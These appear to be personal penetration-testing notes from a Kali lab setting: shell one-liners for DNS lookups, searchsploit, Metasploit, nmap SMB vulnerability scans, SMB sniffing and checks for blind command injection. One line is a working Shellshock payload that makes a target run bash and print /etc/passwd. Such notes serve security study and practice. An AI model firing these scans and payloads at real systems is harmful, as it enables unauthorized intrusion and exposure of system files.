Run nslookup on every host in a file list
for i in $(cat targets); do nslookup "$i"; done
searchsploit SOMETHING
shellshock
curl -H "user-agent:() {:;};echo; /bin/bash -c 'cat /etc/passwd'"
To copy an exploit into the working directory
searchsploit -m EXPLOIT
Test blind command injection
on target box
ping IP
on kali box
tcpdump -i tun0
msfdb run - start the database and run msfconsole
You can use this: $(!!) to recompute (not re-use) the output of the last command.
Example: cp `!!` .
When ifconfig is not available, use ip addr, or /sbin/ifconfig
Recursive grep for a version number, used to identify which files contain it
awk splits each match on ":" and prints the first field (the file name); uniq collapses repeated names
grep -R version_number . | awk -F: '{print $1}' | uniq
less filename
mkdir -p can create nested directories in one command
mkdir -p one/two
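Script to run every nmap SMB vuln script against a list of SMB servers
(cut -f 6 assumes the scripts live in /usr/share/nmap/scripts)
for vul in $(find / -name 'smb*vuln*.nse' 2>/dev/null | cut -d"/" -f 6); do nmap -v -p 139,445 --script="$vul" -iL smb_server_all.txt -oN "smb_vulns_$vul.txt"; done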
Always use full path to execute something
Sniff SMB version
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' & smbclient -L [IP]